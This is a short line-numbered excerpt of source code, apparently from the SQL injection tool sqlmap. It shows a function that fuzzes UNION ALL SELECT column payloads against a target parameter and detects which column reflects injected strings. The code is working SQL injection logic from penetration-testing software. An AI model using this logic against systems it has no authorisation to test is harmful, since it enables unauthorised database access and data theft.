(place, parameter, prefix, suffix)
| 182 | return retVal |
| 183 | |
| 184 | def _fuzzUnionCols(place, parameter, prefix, suffix): |
| 185 | retVal = None |
| 186 | |
| 187 | if Backend.getIdentifiedDbms() and not re.search(FUZZ_UNION_ERROR_REGEX, kb.pageTemplate or "") and kb.orderByColumns: |
| 188 | comment = queries[Backend.getIdentifiedDbms()].comment.query |
| 189 | |
| 190 | choices = getPublicTypeMembers(FUZZ_UNION_COLUMN, True) |
| 191 | random.shuffle(choices) |
| 192 | |
| 193 | for candidate in itertools.product(choices, repeat=kb.orderByColumns): |
| 194 | if retVal: |
| 195 | break |
| 196 | elif FUZZ_UNION_COLUMN.STRING not in candidate: |
| 197 | continue |
| 198 | else: |
| 199 | candidate = [_.replace(FUZZ_UNION_COLUMN.INTEGER, str(randomInt())).replace(FUZZ_UNION_COLUMN.STRING, "'%s'" % randomStr(20)) for _ in candidate] |
| 200 | |
| 201 | query = agent.prefixQuery("UNION ALL SELECT %s%s" % (','.join(candidate), FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "")), prefix=prefix) |
| 202 | query = agent.suffixQuery(query, suffix=suffix, comment=comment) |
| 203 | payload = agent.payload(newValue=query, place=place, parameter=parameter, where=PAYLOAD.WHERE.NEGATIVE) |
| 204 | page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) |
| 205 | |
| 206 | if not re.search(FUZZ_UNION_ERROR_REGEX, page or ""): |
| 207 | for column in candidate: |
| 208 | if column.startswith("'") and column.strip("'") in (page or ""): |
| 209 | retVal = [(_ if _ != column else "%s") for _ in candidate] |
| 210 | break |
| 211 | |
| 212 | return retVal |
| 213 | |
| 214 | def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL): |
| 215 | validPayload = None |
no test coverage detected
searching dependent graphs…